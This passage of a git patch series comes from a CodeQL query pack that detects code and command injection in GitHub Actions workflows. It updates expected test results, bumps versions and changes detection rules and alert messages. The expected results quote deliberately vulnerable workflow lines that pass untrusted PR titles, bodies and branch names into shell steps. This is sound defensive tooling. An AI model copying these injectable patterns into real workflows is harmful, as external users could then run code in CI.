| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4a561f26cb2..5d1ae7c3e74 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | 
@@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -612,8 +613,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | From aecb478e1c4d79206d19fcecfd8cde3a3e5f4146 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:45 +0100 Subject: [PATCH 0641/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a8fab786181..29687dd7a06 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.77 +version: 0.1.78 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f5924ff430c..7b88d83d38e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.77 +version: 0.1.78 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0ad7f08c9fc7e429585f287e9ca75e2689d6e173 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 16:15:47 +0100 Subject: [PATCH 0642/1267] fix: do not require github.event.workflow_run.id as an argument for gh run download --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 56f36316487..31427287b0c 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -178,7 +178,6 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( this.getScript().getACommand().regexpMatch(unzipRegexp()) or this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) From 31a9346d2d0a1a7dd79d3d3744be9680c845538e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 11:59:59 +0100 Subject: [PATCH 0643/1267] feat: show trigger event on query results --- .../CWE-077/EnvPathInjectionCritical.ql | 4 +- .../CWE-077/EnvVarInjectionCritical.ql | 4 +- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 4 +- .../Security/CWE-094/CodeInjectionCritical.ql | 3 +- .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 3 +- .../UntrustedCheckoutTOCTOUCritical.ql | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 3 +- .../CWE-829/ArtifactPoisoningCritical.ql | 4 +- .../CWE-829/UntrustedCheckoutCritical.ql | 3 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-077/EnvPathInjectionCritical.expected | 10 +- .../CWE-077/EnvVarInjectionCritical.expected | 72 ++--- .../CWE-078/CommandInjectionCritical.expected | 2 +- .../ArgumentInjectionCritical.expected | 24 +- .../CWE-094/CodeInjectionCritical.expected | 302 +++++++++--------- .../CachePoisoningViaCodeInjection.expected | 2 +- .../CachePoisoningViaPoisonableStep.expected | 14 +- .../UntrustedCheckoutTOCTOUCritical.expected | 20 +- .../UntrustedCheckoutTOCTOUHigh.expected | 4 +- .../ArtifactPoisoningCritical.expected | 34 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutHigh.expected | 44 +-- 24 files changed, 326 insertions(+), 324 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 7d8a3b49009..3bb1558788a 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
@@ -35,5 +35,5 @@ where sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, - "Potential PATH environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential PATH environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 540edfd8b5f..13086c63080 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -44,5 +44,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index c3d6fa74f6c..7d45b25b1a2 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -26,5 +26,5 @@ where check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) ) select sink.getNode(), source, sink, - "Potential command injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 5962132d72e..6930e2f684a 100644 
